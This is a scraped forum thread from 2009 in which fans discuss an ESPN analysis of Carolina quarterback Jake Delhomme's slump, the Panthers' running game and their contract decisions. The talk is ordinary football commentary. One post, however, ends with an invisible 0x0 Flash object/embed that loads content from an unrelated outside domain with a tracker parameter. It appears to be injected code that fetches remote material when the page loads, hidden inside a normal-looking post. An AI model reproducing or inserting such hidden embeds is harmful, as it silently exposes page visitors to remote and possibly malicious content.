N/S Good Breakdown of Carolina/Delhomme QB problem... not looking good. (1 Viewer)

SebaSaint

Indonesian Coon***
Gold VIP Contributor
Reaction score
nfl_g_delhomme1_200.jpg

Scouting Panthers' QB situation
September 16, 2009 1:38 PM

Posted by ESPN.com's Pat Yasinskas

Like a lot of people, I can't quite understand why Carolina quarterback Jake Delhomme seems to have suddenly fallen apart. That's why I called Jeremy Green of Scouts Inc. for a breakdown on what's going on with Delhomme.

"I don't think this was all of the sudden like a lot of people think," Green said. "Look back to last year, even before the playoff game with Arizona. He had a couple of pretty bad games and that Oakland game really sticks out."

So even if Delhomme's slump isn't that sudden, why is it happening?

"This was always a guy that was a very good game manager," Green said. "He wasn't ever going to beat you with his physical skills, and now his physical skills are deteriorating. He's not even managing the game well now. It's like the game is going too fast for him. You can see he's not comfortable in the pocket and he's not making good decisions. He's struggling with his confidence."

Has Delhomme just "lost it?" Green said that might be the case.

http://espn.go.com/blog/nfcsouth/post?id=2889

I feel bad for Jake, I really do. I think this is his last season as an NFL Quarterback. I however do not feel bad for the Panthers... may they lose and lose badly all year long.

Jake has had a bunch of bad games each season since he took over the starting job in Carolina; however, the emergence of Steve Smith, the solid rushing attacks he's had each season, and the defense that was, at one point - great, all "masked" his flaws. IMO, of course.

Last edited:
It appears to be that at least in our division it's Atlanta that we are going to be fighting to take our division this year.Tons of things can happen but it seems that it's shaping up to be a 2 horse race already.

I think the fact that carolina just gave him a new contract, and didn't offer Peppers one... man that was crazy. They've lost all credibility. I wonder if their GM will be back next year along with Fox and the rest of that staff.

oh and **** Carolina :9:

Jake has had a bunch of bad games each season since he took over the starting job in Carolina; however, the emergence of Steve Smith, the solid rushing attacks he's had each season, and the defense that was, at one point - great, all "masked" from his flaws. IMO, of course.

There's a lot of truth in that. I'm not Jake bashing, but Carolina was running all over everyone last year. That kind of running attack and reciever like smith can make up for a QB with diminished skills, and diminished skills happen to everyone play...one they day they will even happen to Drew.

When someone finally figured out how to stop their running attack, their weakness was exposed. What i can't figure out is why they gave him that big contract extension. Good for Jake, take all the money from them you can i say.

panthers have nothing in reserve right now either..<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

They sure dont. Good thing they go two good RB. Defense are gonna start stacking the line.

Just like the Eagles post game report said. They went into that game with two plans. Take away the running game (as they did) and force them into passing situations (as they did). They have one WR in Steve Smith to take away. Take him out (as they did) and game over. It isn't all Jake but the days of playing jump ball with Steve Smith is over. They are one dimensional for the most part and are living on what they were able to do last year.

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Already have an account? Log in here.

Users who are viewing this thread

Back
    Top Bottom